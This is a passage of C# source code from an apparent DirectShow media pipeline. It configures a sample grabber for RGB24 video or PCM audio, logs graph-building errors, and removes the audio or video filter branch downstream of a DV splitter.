PayloadType.dynamicVideo) { mt.majortype = MediaType.MajorType.MEDIATYPE_Video; //PRI2: RGB24 seems to work for all video? We have used YUY2 in the past, but that won't work // for screen streaming. Probably could use more testing //mt.subtype = MediaType.SubType.MEDIASUBTYPE_YUY2; mt.subtype = MediaType.SubType.MEDIASUBTYPE_RGB24; } else { mt.majortype = MediaType.MajorType.MEDIATYPE_Audio; mt.subtype = MediaType.SubType.MEDIASUBTYPE_PCM; //MEDIASUBTYPE_PCM; } sgGrabber.SetMediaType(ref mt); //Add samplegrabber callback //0 is sampleCB, 1 is bufferCB. Only bufferCB is actually returning data so far. sgGrabber.SetCallback(callBack, 1); sgGrabber.SetOneShot(0); sgGrabber.SetBufferSamples(0); iGB.Render(sourceOutput); UW.CSE.MDShow._AMMediaType uwmt = new UW.CSE.MDShow._AMMediaType(); sgGrabber.GetConnectedMediaType(ref uwmt); connectedMT = copy_AMMediaType(uwmt); } catch (Exception e) { errorMsg = e.Message; Debug.WriteLine("Exception while building graph: " + e.ToString()); eventLog.WriteEntry("Exception while building graph: " + e.ToString(), EventLogEntryType.Error, 1001); return(false); } return(true); }
/// <summary> /// Remove the specified branch from the splitter. /// </summary> /// <param name="payload"></param> private void RemoveFiltersDownstreamFromSplitter(PayloadType payload) { if (dvSplitter != null) { if (payload == PayloadType.dynamicAudio) { RemoveFiltersDownstreamFromPin(splitterAudioOut); audioCompressor = null; } else if (payload == PayloadType.dynamicVideo) { RemoveFiltersDownstreamFromPin(splitterVideoOut); videoCompressor = null; } } }